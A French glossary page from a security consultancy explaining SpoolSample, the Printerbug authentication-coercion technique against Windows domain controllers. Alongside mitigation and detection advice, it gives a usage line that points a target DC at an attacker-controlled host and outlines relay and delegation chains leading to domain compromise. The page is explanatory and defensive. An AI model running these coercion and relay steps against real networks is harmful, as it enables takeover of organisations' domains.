Aller au contenu principal
Expert Cybersécurité & IAv9.0
Centres de ressources conformité
Besoin d'un accompagnement expert ?
Devis personnalisé sous 24h — audit, conformité, incident
Checklists Sécurité — Audit & Durcissement
Formats disponibles
📄 PDF 📊 Excel 🌐 Web

11 checklists professionnelles couvrant 2 200+ points de contrôle. Téléchargement gratuit, aucune inscription.

SpoolSample

ad

Définition

SpoolSample est un outil et une technique offensive exploitant la vulnérabilité connue sous le nom de Printerbug via le protocole MS-RPRN (Print System Remote Protocol), forçant un contrôleur de domaine à s'authentifier auprès d'une machine choisie par l'attaquant. Développé par Lee Christensen (@tifkin_) et publié en 2018, SpoolSample déclenche spécifiquement la méthode RpcRemoteFindFirstPrinterChangeNotification du service Spouleur d'impression Windows, une fonctionnalité légitime conçue pour notifier un client des changements de statut d'une imprimante distante, mais dont le paramètre de notification peut être détourné pour pointer vers un hôte contrôlé par l'attaquant. SpoolSample est considéré comme l'une des toutes premières techniques de coercion d'authentification largement documentées, précédant chronologiquement PetitPotam et DFSCoerce qui exploitent des mécanismes RPC comparables sur d'autres protocoles Windows, et ayant ouvert la voie à toute une catégorie de recherches ultérieures sur les vecteurs de coercion. Combinée à un relais NTLM vers AD CS ou LDAP, cette technique permet d'aboutir à une compromission complète du domaine via l'obtention d'un certificat ou de droits de réplication au nom du contrôleur de domaine coercé. La mitigation de référence reste la désactivation pure et simple du service Spouleur d'impression sur les contrôleurs de domaine, service activé par défaut mais rarement nécessaire fonctionnellement sur ces systèmes.

Fonctionnement technique

SpoolSample.exe [\\target_DC] [\\attacker_host] appelle RpcRemoteFindFirstPrinterChangeNotification sur le DC cible, le forçant à se connecter NTLM vers l'hôte attaquant. Le service Spooler doit être actif sur le DC cible (arrêté sur les DC récents par recommandation Microsoft).

Exploitation et vecteurs d'attaque

  • Unconstrained Delegation + SpoolSample : Capturer TGT du DC pour DCSync ou impersonation
  • NTLM Relay : SpoolSample → Responder/NTLMRelayx
  • Combined Attacks : SpoolSample + BloodHound pour automated path exploitation

Détection et mitigation

  • Désactiver Print Spooler sur les DC : Stop-Service Spooler; Set-Service Spooler -StartupType Disabled
  • Event ID 4648 : outbound NTLM depuis DC
  • Monitoring des connexions RPC vers port 135/445 depuis les DC

Articles liés

Un projet cybersécurité ?

Expert dispo · Réponse 24h

Devis